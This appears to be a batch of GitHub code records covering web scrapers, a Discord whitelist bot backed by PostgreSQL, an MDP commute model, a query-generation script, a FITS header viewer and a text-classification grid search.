self.request.user.social_auth.filter(provider=\"steam\").get()\n return u.uid\n except ObjectDoesNotExist:\n pass\n\n return None\n\n # def get_initial(self):\n # \"\"\"\n # Returns the initial data to use for forms on this view.\n # \"\"\"\n #\n # steam = self._get_steam()\n #\n # domain = get_current_site(self.request).domain\n #\n # initial = {\n # \"business\": settings.PAYPAL_RECEIVER_EMAIL,\n # \"item_name\": \"Donation\",\n # \"invoice\": str(steam)+\":\"+uuid.uuid4().hex,\n # \"notify_url\": \"http://\" + \"localhost:8000/\" + reverse('paypal-ipn'),\n # \"return_url\": \"http://localhost:8000/donate\",\n # \"cancel_return\": \"http://localhost:8000/donate\",\n # \"custom\": steam, # Custom command to correlate to some function later (optional)\n # }\n #\n #\n # return initial\n\n def _get_current_players(self):\n try:\n # query_results = ScapePlayer.objects.all().order_by('-duration')\n query_results = ScapePlayer.objects.all()\n for player in query_results:\n # sec = timedelta(seconds=player.duration)\n # d = datetime(1, 1, 1) + sec\n #\n # # print(\"DAYS:HOURS:MIN:SEC\")\n # player.duration = (\"%d:%d:%d:%d\" % (d.day - 1, d.hour, d.minute, d.second))\n a = player.duration # last epoch recorded\n b = int(time.time()) # current epoch time\n c = b - a # returns seconds\n days = c / 86400\n hours = c / 3600 % 24\n minutes = c / 60 % 60\n seconds = c % 60\n player.duration = \"{} days, {} hours, {} minutes, {} seconds.\".format(days, hours, minutes, seconds)\n except ScapePlayer.DoesNotExist:\n query_results = \"None\"\n return query_results","repo_name":"aldenjenkins/ThiccGaming","sub_path":"site/thicc/apps/scape/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41146792546","text":"import scrapy\n\nclass FirstSpider(scrapy.Spider):\n name = \"reviewer\"\n#scrapy crawl reviewer -o a.json\n start_urls=[\n 'https://www.amazon.com/AhaStyle-Upgrade-Protective-Silicone-Compatible/product-reviews/B077187F2R/ref=cm_cr_dp_d_show_all_btm?ie=UTF8&reviewerType=all_reviews'\n ]\n\n def parse(self, response):\n for div in response.xpath('//div[@class=\"a-section celwidget\"]'):\n name=div.xpath('div[@class=\"a-row a-spacing-mini\"]/a/div/span/text()').extract_first()\n id=div.xpath('div[@class=\"a-row a-spacing-mini\"]/a/@href').re(\"\\\\w{28}\")[0]\n star=div.xpath('div[@class=\"a-row\"]/a/i/span/text()').extract_first()\n verified=div.xpath('div[@class=\"a-row a-spacing-mini review-data review-format-strip\"]/span/a/span/text()').extract_first()\n date=div.xpath('span[@class=\"a-size-base a-color-secondary review-date\"]/text()').extract_first()\n #print(name+' '+star+' '+id+' '+verified+' '+date)\n yield {\n 'name':name,\n 'id':id,\n\n 'rating':star,\n 'verified status':verified,\n 'date':date\n }\n\n next=\"https://www.amazon.com\"+response.xpath('//li[@class=\"a-last\"]/a/@href').extract_first()\n yield scrapy.Request(next)\n\n #next='https://www.amazon.com'+response.xpath('//li[@class=\"a-last\"]/a/@href').extract_first()\n #print(next)\n #yield scrapy.Request(next)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"jokernight820/amazontest","sub_path":"zhiyuan_test/zhiyuan_test/spiders/firstSpider.py","file_name":"firstSpider.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11736923163","text":"from pymongo import mongo_client\nfrom bs4 import BeautifulSoup\nimport requests\n\nweburl = \"https://finance.naver.com/item/sise_day.nhn?code=068270&page=1\"\nresponse = requests.get(weburl, headers={'User-agent':'Mozilla/5.0'})\nsource = response.text\n\nurl = \"mongodb://localhost:27017/\"\nmgClient = mongo_client.MongoClient(url)\ndb = mgClient[\"parkdb\"]\ncol = db[\"address\"]\n\nsoup = BeautifulSoup(source, 'lxml')\ntd_pgRR = soup.find('td', class_='pgRR')\na_href = td_pgRR.a['href']\na_href_split_list = a_href.split(\"=\")\nlast_page = a_href_split_list[-1]\n\nimport pandas as pd\ndf = pd.DataFrame()\nbase_url = \"https://finance.naver.com/item/sise_day.nhn?code=068270\"\n#for page in range(1, int(last_page)+1):\nfor page in range(1, 3):\n url = \"{}&page={}\".format(base_url, page)\n response = requests.get(url, headers={'User-agent':'Mozilla/5.0'})\n source = response.text\n html = pd.read_html(source, header=0)[0]\n df = pd.concat([df, html])\ndf = df.dropna()\ndf = df.sort_values(by='날짜')\ndf = df.to_dict('records')\n\n#print(df)\n\n#col.insert_many(df)\n#where = {\"종가\":{\"$gt\":185000}} # 종가가 185000보다 큰 값만 출력\n#where = {\"날짜\":{\"$gte\":\"2022.07.01\"}} #날짜가 2022.07.01이후의 값만 출력\n#where = {\"날짜\":{\"$lte\":\"2022.06.29\"}} #날짜가 2022.06.29이전의 값만 출력\nwhere = {\"시가\":{\"$gte\":160000}} #시가가 160000원 이상의 값만 출력\ndocs = col.find(where, {\"_id\":0, \"날짜\":1})\nfor doc in docs:\n print(doc)\n#col.drop()","repo_name":"pjs845/test","sub_path":"day05_mongodb/mission.py","file_name":"mission.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40321982206","text":"# coding=utf-8\nfrom __future__ import (\n absolute_import, division, print_function, unicode_literals\n)\n\nimport matplotlib.pyplot as plt\nfrom scipy.stats import *\n\nfrom src.core.mdp import State, Action, MDP, TransitionFunction\nfrom src.util.math_utils import make_time_string, t2n, softmax\n\nABS = 0\nREL = 1\n\n\nclass TMDPTransition(TransitionFunction):\n def __init__(self, env=None):\n TransitionFunction.__init__(self, env)\n\n def __call__(self, state, action, **kwargs):\n pass\n\n\nclass TMDPState(State):\n def __init__(self, state_id, symbol, time_index):\n super(TMDPState, self).__init__(state_id)\n self.symbol = symbol\n self.time_index = time_index\n self.time_label = make_time_string(self.time_index)\n self._actions = {}\n\n def actions(self):\n return self._actions\n\n def add_action(self, action):\n if action.action_id not in self._actions:\n self._actions[action.action_id] = action\n\n def get_all_outcomes(self, aid):\n return self._actions[aid].outcomes\n\n def outcome(self, aid):\n outcomes = self.get_all_outcomes(aid)\n return np.random.choice(outcomes[:, 1], replace=False, p=outcomes[:, 0].astype(float))\n\n def __hash__(self):\n return hash((self.state_id, self.time_index))\n\n def __eq__(self, other):\n return self.state_id == other.state_id and self.time_index == other.time_index\n\n def __str__(self):\n return '[{} @ {}]'.format(self.symbol, self.time_label)\n\n def __repr__(self):\n return self.__str__()\n\n\nclass TMDPAction(Action):\n def __init__(self, action_id, action_label):\n super(TMDPAction, self).__init__(action_id)\n self.action_label = action_label\n self._outcomes = []\n\n @property\n def outcomes(self):\n return np.asarray(self._outcomes)\n\n @outcomes.setter\n def outcomes(self, outcomes):\n self._outcomes = np.asarray(outcomes)\n\n def add_outcome(self, outcome):\n self._outcomes.append(outcome)\n\n def __str__(self):\n return self.action_label\n\n def __repr__(self):\n return self.__str__()\n\n def __eq__(self, other):\n return self.action_id == other.action_id\n\n def __hash__(self):\n return hash(self.action_id)\n\n\nclass TMDP(MDP):\n def __init__(self, reward_function,\n transition,\n horizon,\n discretization,\n initial_state,\n state_types,\n action_types):\n super(TMDP, self).__init__(reward_function, transition, graph=None, gamma=0)\n self.action_types = action_types\n self._action_dict = dict((v, t) for v, t in enumerate(self.action_types))\n self._actions = None\n self._state_types = state_types\n self._initial_state = initial_state\n self.horizon = horizon\n self.disc = discretization # assumed in minutes for now\n self._tidx = int(self.horizon / self.disc)\n self._states = np.zeros([len(self._state_types), self._tidx], dtype=object)\n self._terminals = None\n\n def set_outcomes(self, outcomes):\n self._outcomes = outcomes\n\n @property\n def initial_state(self):\n return self._initial_state\n\n @property\n def A(self):\n return self._action_dict\n\n def available_actions(self, state):\n return self._states[state].available_actions()\n\n @property\n def S(self):\n return self._states\n\n def get_outcome(self, s, t, a):\n return self._states[s][t].get_random_outcome(a)\n\n def approximate_value_iteration(self, r, threshold=1e-16, gamma=1, temperature=1):\n\n nA = len(self._action_dict.keys())\n nS = len(self._states)\n V = np.zeros(nS, dtype=np.float64)\n Q = np.zeros([nS, nA], dtype=np.float64)\n i = 0\n diff = float(\"inf\")\n\n while diff > threshold:\n V_prev = np.copy(V)\n\n for s_idx, state_x in enumerate(self.S):\n if state_x in self._terminals:\n continue\n actions = state_x.available_actions()\n for a in actions:\n Q[s_idx, a] = sum([o[0] * (r[s_idx][o[1].state_id] + V_prev[o[1].state_id])\n for o in actions[a].outcomes])\n V = softmax(Q, temperature)\n diff = np.amax(np.abs(V_prev - V))\n\n i += 1\n print(diff)\n print(i)\n if diff == 0:\n V = V.reshape((-1, 1))\n expt = lambda x: np.exp(x / temperature)\n policy = expt(Q - V)\n\n # Stochastic policy... make sure that ∀ \\sum_a p(a|s) == 1\n assert np.allclose(policy.sum(1), np.ones(nS))\n return policy, Q, V\n\n def _assign_pdf_abs(self, s_to, time_span, scale):\n start, middle, end = time_span\n X = truncnorm((start - middle) / scale, (end - middle) / scale, loc=middle, scale=scale)\n raw_p = X.pdf(range(start, end, self.disc))\n tot = sum(raw_p)\n rescaled = raw_p / tot\n t_ids = (np.array(list(range(start, end, self.disc))) / self.disc).astype(int)\n states = [self._states[s_to][t_id] for t_id in t_ids]\n return zip(rescaled, states)\n\n def _assign_pdf_rel(self, s_to, t_id_in, time_span, scale):\n start, middle, end = time_span\n X = truncnorm((start - middle) / scale, (end - middle) / scale, loc=middle, scale=scale)\n raw_p = X.pdf(range(start, end, self.disc))\n tot = sum(raw_p)\n rescaled = raw_p / tot\n t_ids = (np.array(list(range(start, end, self.disc))) / self.disc).astype(int)\n new_t_ids = [t_id + t_id_in for t_id in t_ids]\n states = [self._states[s_to][new_t_id] for new_t_id in new_t_ids]\n return zip(rescaled, states)\n\n\ndef mk_Trans_mat(mdp):\n s_arr = np.array([s for sub in mdp.S for s in sub])\n a_arr = np.array(mdp.A.keys())\n nS = len(s_arr)\n nA = len(a_arr)\n P = np.zeros([nA, nS, nS], dtype=np.float32)\n for s in s_arr:\n for a_idx, a in s.available_actions().items():\n outcomes = a.outcomes\n sps = [o.state_id for o in outcomes[:, 1]]\n ps = [p for p in outcomes[:, 0]]\n for p, sp in zip(ps, sps):\n P[a_idx, s.state_id, sp] = p\n return P\n\n\ndef initialize_test_mdp(mdp):\n action_dict = mdp._action_dict\n\n ## A0|dawdling (all states):\n k, v = action_dict.items()[0]\n\n s_id = mdp._tidx - 1\n for s, label in enumerate(mdp.state_types):\n st = list(reversed(range(mdp._tidx)))\n for t, tidx in zip(st, np.arange(mdp.horizon - mdp.disc, -mdp.disc, -mdp.disc)):\n if t == mdp._states.shape[1] - 1:\n state = TMDPState(s_id, label, mdp.horizon - mdp.disc)\n dawdling = TMDPAction(k, v)\n dawdling.add_outcome([1.0, state])\n state.add_action(dawdling)\n else:\n state = TMDPState(s_id, label, tidx)\n dawdling = TMDPAction(k, v)\n dawdling.add_outcome([1.0, mdp._states[s][t + 1]])\n state.add_action(dawdling)\n mdp._states[s][t] = state\n s_id -= 1\n s_id = ((s + 2) * mdp._tidx) - 1\n\n ## A1|morning commute by pt:\n k, v = action_dict.items()[1]\n morning_pt_arrival_ts = t2n(9, 10), t2n(9, 45), t2n(10, 20)\n pt_sd = 12.5\n sf, st = int(t2n(7, 0) / mdp.disc), int(t2n(7, 50) / mdp.disc)\n for t in range(sf, st):\n commute_by_pt = TMDPAction(k, v)\n commute_by_pt.outcomes = mdp._assign_pdf_abs(2, morning_pt_arrival_ts, pt_sd)\n mdp._states[0][t].add_action(commute_by_pt)\n\n ## A2|driving to work via highway:\n k, v = action_dict.items()[2]\n off_peak_ts = t2n(0, 30), t2n(1, 30), t2n(2, 30) #\n car_sd = 25.5\n sf, st = int(t2n(7, 0) / mdp.disc), int(t2n(7, 20) / mdp.disc) # 7:20\n\n for t in range(sf, st):\n drive_hway = TMDPAction(k, v)\n drive_hway.outcomes = mdp._assign_pdf_rel(1, t, off_peak_ts, car_sd)\n mdp._states[0][t].add_action(drive_hway)\n\n sf, st = int(t2n(7, 30) / mdp.disc), int(t2n(7, 50) / mdp.disc)\n for t in range(sf, st):\n drive_hway = TMDPAction(k, v)\n\n # prob of rush increasing from 07:20 (state 2) with prob 0.0 to 08:00 (state 6) with prob 1.0\n # the prob of rush hour/off peak for state 3,4,5 are 0.25/0.75,0.50/0.50, 0.75/0.25\n outcomes = []\n\n # rush hour\n rush_hour_ts = mk_ts([[0, 30], [2, 20], [6, 0]])\n outcomes_tmp = mdp._assign_pdf_rel(1, t, rush_hour_ts, car_sd)\n outcomes.extend([(p * 0.25 * (t - 2), s) for (p, s) in outcomes_tmp])\n\n # off peak\n off_peak_ts = mk_ts([[0, 30], [1, 30], [2, 30]])\n outcomes_tmp = mdp._assign_pdf_rel(1, t, off_peak_ts, car_sd)\n outcomes.extend([(p * 0.25 * (t - 2), s) for (p, s) in outcomes_tmp])\n drive_hway.outcomes = outcomes\n mdp._states[0][t].add_action(drive_hway)\n\n ##\n sf, st = int(t2n(8, 00) / mdp.disc), int(t2n(9, 30) / mdp.disc)\n rush_hr_ts = mk_ts([[0, 30], [2, 20], [6, 0]])\n for t in range(sf, st): # 8:00 ~ 9:30\n drive_hway = TMDPAction(k, v)\n drive_hway.outcomes = mdp._assign_pdf_rel(1, t, rush_hr_ts, car_sd)\n mdp._states[0][t].add_action(drive_hway)\n sf, st = int(t2n(9, 40) / mdp.disc), int(t2n(10, 10) / mdp.disc)\n for t in range(sf, st): # 09:40 ~ 10:10\n drive_hway = TMDPAction(k, v)\n outcomes = []\n # rush hour\n rush_hour_ts = mk_ts([[0, 30], [2, 20], [6, 0]])\n outcomes_tmp = mdp._assign_pdf_rel(1, t, rush_hour_ts, car_sd)\n outcomes.extend([(p * 0.25 * (t - 2), s) for (p, s) in outcomes_tmp])\n\n # off peak\n off_peak_ts = mk_ts([[0, 30], [1, 30], [2, 30]])\n outcomes_tmp = mdp._assign_pdf_rel(1, t, off_peak_ts, car_sd)\n outcomes.extend([(p * 0.25 * (t - 2), s) for (p, s) in outcomes_tmp])\n drive_hway.outcomes = outcomes\n mdp._states[0][t].add_action(drive_hway)\n\n off_peak_ts = t2n(0, 30), t2n(1, 30), t2n(2, 30) #\n sf, st = int(t2n(10, 20) / mdp.disc), int(t2n(14, 30) / mdp.disc)\n for t in range(sf, st): # 10:20(20) ~ 14:00(42)\n # off peak\n drive_hway = TMDPAction(k, v)\n drive_hway.outcomes = mdp._assign_pdf_rel(1, t, off_peak_ts, car_sd)\n mdp._states[0][t].add_action(drive_hway)\n\n ## A3|driving to work via backroad:\n k, v = action_dict.items()[3]\n for t in range(0, mdp._tidx):\n new_tid = t + int(t2n(1, 00) / 10)\n drive_hway = TMDPAction(k, v)\n if new_tid < mdp._tidx:\n drive_hway.outcomes = [(1.0, mdp._states[2][new_tid])]\n else:\n drive_hway.outcomes = [(1.0, mdp._states[2][mdp._tidx - 1])]\n mdp._states[1][t].add_action(drive_hway)\n mdp._terminals = [s[-1] for s in mdp._states]\n mdp.T = mk_Trans_mat(mdp)\n mdp._states = [s for sub in mdp.S for s in sub]\n return mdp\n\n\ndef mk_ts(arr):\n return tuple(map(lambda x: t2n(x[0], x[1]), (arr[0], arr[1], arr[2])))\n\n\ndef init_test_rewards(states):\n dim_s = len(states)\n rewards = np.zeros([dim_s, dim_s], dtype=np.float32)\n for s_from in states:\n for s_to in states:\n if s_to.symbol == 'Work' and s_from.symbol != 'Work':\n a, b = s_to.time_label.split(\":\")\n time = t2n(*tuple([int(e) for e in (a, b)]))\n if time < t2n(11, 00):\n rewards[s_from.state_id][s_to.state_id] = 1.0 # +1 for arriving at work before 11:00\n elif time < t2n(12, 00):\n rewards[s_from.state_id][s_to.state_id] = (t2n(12, 00) - time) / t2n(1,\n 00) # falls linearly to zero (11:00 ~ 12:00)\n else:\n rewards[s_from.state_id][s_to.state_id] = 0.0\n else:\n rewards[s_from.state_id][s_to.state_id] = 0.0\n return rewards\n\n\nif __name__ == '__main__':\n activity_types = ['Home', 'Work', 'x2']\n action_types = ['dawdling', 'commute_by_pt', 'driving to work via highway', 'driving on backroad']\n\n mdp = TMDP(None, None, 1200, 5, 'home', activity_types,\n action_types)\n initialize_test_mdp(mdp)\n reward = init_test_rewards(mdp.S)\n p, Q, V = mdp.approximate_value_iteration(reward)\n plt.plot(range(len(V)), V)\n plt.show()\n print(p.sum(1))\n","repo_name":"sfwatergit/da-irl","sub_path":"src/core/tmdp.py","file_name":"tmdp.py","file_ext":"py","file_size_in_byte":12486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"39095188873","text":"\"\"\"\nIn this example we train a semantic search model to search through Wikipedia\narticles about programming articles & technologies.\n\nWe use the text paragraphs from the following Wikipedia articles:\nAssembly language, C , C Sharp , C++, Go , Java , JavaScript, Keras, Laravel, MATLAB, Matplotlib, MongoDB, MySQL, Natural Language Toolkit, NumPy, pandas (software), Perl, PHP, PostgreSQL, Python , PyTorch, R , React, Rust , Scala , scikit-learn, SciPy, Swift , TensorFlow, Vue.js\n\nIn:\n1_programming_query_generation.py - We generate queries for all paragraphs from these articles\n2_programming_train_bi-encoder.py - We train a SentenceTransformer bi-encoder with these generated queries. This results in a model we can then use for sematic search (for the given Wikipedia articles).\n3_programming_semantic_search.py - Shows how the trained model can be used for semantic search\n\"\"\"\nimport json\nimport gzip\nfrom transformers import T5Tokenizer, T5ForConditionalGeneration\nimport torch\nimport tqdm\nimport os\nfrom sentence_transformers import util\n\nparagraphs = set()\n\n# We use the Wikipedia articles of certain programming languages\ncorpus_filepath = 'wiki-programmming-20210101.jsonl.gz'\nif not os.path.exists(corpus_filepath):\n util.http_get('https://sbert.net/datasets/wiki-programmming-20210101.jsonl.gz', corpus_filepath)\n\nwith gzip.open(corpus_filepath, 'rt') as fIn:\n for line in fIn:\n data = json.loads(line.strip())\n\n for p in data['paragraphs']:\n if len(p) > 100: #Only take paragraphs with at least 100 chars\n paragraphs.add(p)\n\nparagraphs = list(paragraphs)\nprint(\"Paragraphs:\", len(paragraphs))\n\n\n# Now we load the model that is able to generate queries given a paragraph.\n# This model was trained on the MS MARCO dataset, a dataset with 500k\n# queries from Bing and the respective relevant passage\ntokenizer = T5Tokenizer.from_pretrained('BeIR/query-gen-msmarco-t5-large-v1')\nmodel = T5ForConditionalGeneration.from_pretrained('BeIR/query-gen-msmarco-t5-large-v1')\nmodel.eval()\n\n#Select the device\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nmodel.to(device)\n\n# Parameters for generation\nbatch_size = 8 #Batch size\nnum_queries = 5 #Number of queries to generate for every paragraph\nmax_length_paragraph = 300 #Max length for paragraph\nmax_length_query = 64 #Max length for output query\n\n# Now for every paragraph in our corpus, we generate the queries\nwith open('generated_queries.tsv', 'w') as fOut:\n for start_idx in tqdm.trange(0, len(paragraphs), batch_size):\n sub_paragraphs = paragraphs[start_idx:start_idx+batch_size]\n inputs = tokenizer.prepare_seq2seq_batch(sub_paragraphs, max_length=max_length_paragraph, truncation=True, return_tensors='pt').to(device)\n outputs = model.generate(\n **inputs,\n max_length=max_length_query,\n do_sample=True,\n top_p=0.95,\n num_return_sequences=num_queries)\n\n for idx, out in enumerate(outputs):\n query = tokenizer.decode(out, skip_special_tokens=True)\n para = sub_paragraphs[int(idx/num_queries)]\n fOut.write(\"{}\\t{}\\n\".format(query.replace(\"\\t\", \" \").strip(), para.replace(\"\\t\", \" \").strip()))\n\n","repo_name":"UKPLab/sentence-transformers","sub_path":"examples/unsupervised_learning/query_generation/1_programming_query_generation.py","file_name":"1_programming_query_generation.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":12439,"dataset":"github-code","pt":"48"} +{"seq_id":"70945219347","text":"import psycopg2\nimport os\nfrom discord.ext import commands\nimport discord\nfrom time import sleep\n\nTOKEN = os.getenv('DISCORD_TOKEN')\n\nbot = commands.Bot(command_prefix='!')\nclient = discord.Client()\n\n\n@client.event\nasync def on_message(message):\n if message.guild:\n if not str('923579001010794527') in str(message.author.id) and str(message.channel.id) == '927245506130878504':\n if message.content == '!!help':\n await message.channel.send(getHelpMessage())\n elif message.content == '!!info':\n await message.channel.send(getInfoMessage())\n elif message.content == '!!check':\n result = readDatabase('check', message.author.id, message.content)\n if len(result) > 0:\n await message.channel.send('Your address is set: ' + str(result[0][0]))\n sleep(10)\n await message.channel.purge(limit=1000000)\n await message.channel.send(getHelpMessage())\n else:\n await message.channel.send('No address set yet.')\n elif str('!!set') in message.content:\n result = readDatabase('check', message.author.id, message.content)\n token = message.content.replace('!!set ', '')\n if len(result) == 1:\n await message.channel.send('Sorry! There is already set an address for this user.')\n sleep(10)\n await message.channel.purge(limit=1000000)\n await message.channel.send(getHelpMessage())\n else:\n if len(token) > 25:\n await message.channel.purge(limit=1)\n readDatabase('set', message.author.id, token)\n await message.channel.send('Address is set! Use **!!check** to verify!')\n sleep(7)\n await message.channel.purge(limit=1000000)\n await message.channel.send(getHelpMessage())\n else:\n await message.channel.send('Not a valid token address!')\n elif str('!!update') in message.content:\n result = readDatabase('check', message.author.id, message.content)\n token = message.content.replace('!!update ', '')\n if len(result) == 0:\n await message.channel.send('Sorry! There is no address for this account yet.')\n else:\n if len(token) > 25:\n readDatabase('update', message.author.id, token)\n await message.channel.send('Address is updated! Use **>>check** to verify!')\n sleep(5)\n await message.channel.purge(limit=1000000)\n await message.channel.send(getHelpMessage())\n else:\n await message.channel.send('Not a valid token address!')\n\n\ndef getHelpMessage():\n welcomeMessage = f\"\\nWelcome to the Whitelist bot!\\n\" \\\n \"Example: !!set 0xCD90d9bA0060937c442C5560055a785Ed428E1F9\\n\" \\\n \"**Commands**\\n\" \\\n \"```!!info : why is this BOT here?\\n\" \\\n \"!!check : will return the current address saved for your current discord ID\\n\" \\\n \"!!set
: whitelist is closed\\n\" \\\n \"!!update
: will update your address\\n```\"\n\n return welcomeMessage\n\n\ndef getInfoMessage():\n infoMessage = f\"```This bot is made to set all whitelist addresses so you can get access to our presale of the VeeParrots-NFT collection.\\n\" \\\n \"If you don't set a valid address, you will not be able to mint NFT's in our presale.```\"\n return infoMessage\n\n\n@client.event\nasync def on_ready():\n print(f'{client.user} has connected to Discord!')\n\n\ndef readDatabase(type, value, value2):\n global connection\n try:\n connection = psycopg2.connect(user=os.getenv('USER'),\n password=os.getenv('PASSWORD'),\n host=os.getenv('HOST'),\n port=5432,\n database=os.getenv('DATABASE'))\n cursor = connection.cursor()\n\n result = ''\n\n if type == 'check':\n query = 'SELECT address, name FROM public.whitelists w where name = \\'' + str(value) + '\\''\n cursor.execute(query)\n result = cursor.fetchall()\n\n if type == 'set':\n postgres_insert_query = \"\"\" INSERT INTO public.whitelists(address, name) VALUES (%s, %s)\"\"\"\n record_to_insert = (value2, value)\n cursor.execute(postgres_insert_query, record_to_insert)\n connection.commit()\n result = cursor.rowcount\n if type == 'update':\n postgres_insert_query = \"\"\" UPDATE public.whitelists SET address=(%s), name=(%s) WHERE name = (%s);\"\"\"\n record_to_insert = (value2, value, str(value))\n cursor.execute(postgres_insert_query, record_to_insert)\n connection.commit()\n result = cursor.rowcount\n\n print('res', result)\n return result\n\n\n except (Exception, psycopg2.Error) as error:\n print(error)\n return str(error)\n\n finally:\n # closing database connection.\n if connection:\n cursor.close()\n connection.close()\n\n\nclient.run(TOKEN)\n","repo_name":"FullStackDevFrancis/whitelist-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18404340879","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nimport argparse\nimport warnings\nimport astropy.io.fits as fits\n\nwarnings.filterwarnings('ignore')\n\n\ndef load_keys(keys_file):\n try:\n with open(keys_file) as f:\n keys = [k.strip('\\n') for k in f.readlines()]\n except (IOError, TypeError):\n print('Cannot open: {}'.format(keys_file))\n sys.exit(1)\n\n return keys\n\n\ndef open_hdr(file_to_open):\n hdr = fits.getheader(file_to_open)\n\n return hdr\n\n\ndef show_keys(name, keys, hdr):\n\n output_keys = []\n\n for key in keys:\n try:\n hdr_key = hdr[key]\n if not args.miss:\n output_keys.append([key, hdr_key])\n except KeyError:\n output_keys.append([key, 'Not found'])\n\n if len(output_keys) > 0:\n print('')\n print('File: {}'.format(name))\n\n for key, value in output_keys:\n print('{}: {}'.format(key, value))\n\n\ndef main():\n keys = load_keys(args.keys)\n for root, _, files in os.walk('.'):\n for name in files:\n if name.endswith(args.ext):\n hdr = open_hdr(os.path.join(root, name))\n show_keys(name, keys, hdr)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Show FITS hdr keys')\n parser.add_argument('-m', '--miss', action='store_true',\n help='If set program will show only missing keys')\n parser.add_argument('--keys', type=str, default=os.path.join(\n os.path.dirname(os.path.realpath(__file__)), 'keys.txt'),\n nargs='?', help='Dir to file with keys to show, '\n 'Default: keys.txt on program dir')\n parser.add_argument('--ext', type=str, default='.fits',\n nargs='?', help='File to open, '\n 'Default: .fits')\n args = parser.parse_args()\n\n main()\n","repo_name":"MichalZG/showHdrKeys","sub_path":"showHdrKeys.py","file_name":"showHdrKeys.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23754796606","text":"import pandas as pd\nimport sys\nimport io\nimport time\nimport numpy as np\nfrom datetime import datetime\nimport numpy as np\nimport nltk\nimport re\nfrom nltk.corpus import stopwords\nfrom string import punctuation\nfrom sklearn.feature_extraction.text import CountVectorizer, HashingVectorizer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn import metrics\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.base import clone\nimport glob\nfrom sklearn.metrics import classification_report\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.linear_model import SGDClassifier, PassiveAggressiveClassifier, Perceptron\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nimport pathlib\n\ndef get_pipe_list(algs):\n \"\"\"\n Função que tem o propósito de gerar uma lista de pipelines com vários algoritmos e parâmetros diferentes.\n \"\"\"\n pipelist = []\n \n for j in range(0, len(algs)):\n pipelist.append(Pipeline([('vect', HashingVectorizer(analyzer=\"word\", stop_words = set(stopwords.words('portuguese') + list(punctuation)))),\n ('tfidf', TfidfTransformer()), \n ('clf', clone(algs[j])),]))\n return pipelist\n\ndef get_true_false(lista):\n zipped = [[sum(item) for item in zip(items)] for items in zip(*lista)]\n TList = []\n FList = []\n for i in range(0, len(lista)):\n ipred = sum(zipped[i])\n Tpred = lista[i][i]\n TList.append(Tpred) \n FList.append(ipred - Tpred)\n return TList + FList\n\n\n#Obtendo o path do diretório atual\npath = str(pathlib.Path().absolute()) \n\n#Planilhas para treinos e testes\ntrain_np = pd.read_csv(path+'\\\\Planilhas\\\\train_test\\\\train_np.csv')\ntest_np = pd.read_csv(path+'\\\\Planilhas\\\\train_test\\\\test_np.csv')\ntrain_neutral = pd.read_csv(path+'\\\\Planilhas\\\\train_test\\\\train_neutral.csv')\ntest_neutral = pd.read_csv(path+'\\\\Planilhas\\\\train_test\\\\test_neutral.csv')\n\ndf_list =[[train_np, test_np], [train_neutral, test_neutral]]\ntestes = [\"sem notícias neutras balanceado\", \"com notícias neutras balanceado\"]\nparamList = ['n-gram(1,1)', 'n-gram(1,2)']\nalgoList = ['Decision Tree']\n\n#criando lista de pipelines\n#params = {'n-grams': [(1,1), (1,2)]}\n#pipelist = get_pipe_list([MultinomialNB(), SGDClassifier(), Perceptron(), DecisionTreeClassifier(), PassiveAggressiveClassifier(), RandomForestClassifier()])\npipelist = [Pipeline([('vect', CountVectorizer(analyzer=\"word\", stop_words = set(stopwords.words('portuguese') + list(punctuation)))),\n ('tfidf', TfidfTransformer()), \n ('clf', DecisionTreeClassifier())])]\n#dicionário com parâmetros dos componentes do pipeline antes do algoritmo em si\nparam_dict = {'vect__ngram_range': [(1, 1), (1, 2)],\n 'tfidf__use_idf': (True, False),\n 'tfidf__norm': ('l1', 'l2'),}\n\n#Lista com dicionários com parâmetros para os algoritmos\nparameter_list = [{'clf__max_depth': (15, 35),\n 'clf__min_samples_split': (75, 125),\n 'clf__min_samples_leaf': (25, 35),\n 'clf__max_features': (0.5, 'sqrt'),\n 'clf__criterion': ('gini', 'entropy'),\n}]\n\ncmp = pd.DataFrame(columns = [\"Algoritmo\", \"Parâmetros\", \"Parâmetros testados\", \"Melhores parâmetos\", \"Tipo\", \"Acurácia\", \"Duração Treino\", \"Duração Teste\", \"FN\", \"FP\", \"FNT\", \"TN\", \"TP\", \"TNT\", \"Precisão\", \"F1\", \"Recall\", \"N_treino\", \"N_teste\"])\ndic_list = []\n\nfor i in range(0, 1):\n\n #Preparando as listas com notícias e classificações para treino e teste\n \n train_news = df_list[i][0]\n train_classif = train_news[\"Modelo\"]\n train_news = train_news[\"Notícia\"]\n test_news = df_list[i][1]\n test_classif = test_news[\"Modelo\"]\n test_news = test_news[\"Notícia\"]\n if(\"Neutro\" in train_classif):\n lista = ['Negativo', 'Neutro', 'Positivo']\n else:\n lista = ['Negativo', 'Positivo']\n n_treino = len(train_news)\n \n for j in range(0, len(pipelist)):\n params = dict(**param_dict, **parameter_list[0])\n randomS = RandomizedSearchCV(pipelist[j], params, cv=3, n_jobs=10, pre_dispatch=8, n_iter=10) #objeto para Randomized search\n time_train = time.time() #verificando o tempo decorrido durante os treinos\n randomS.fit(train_news, 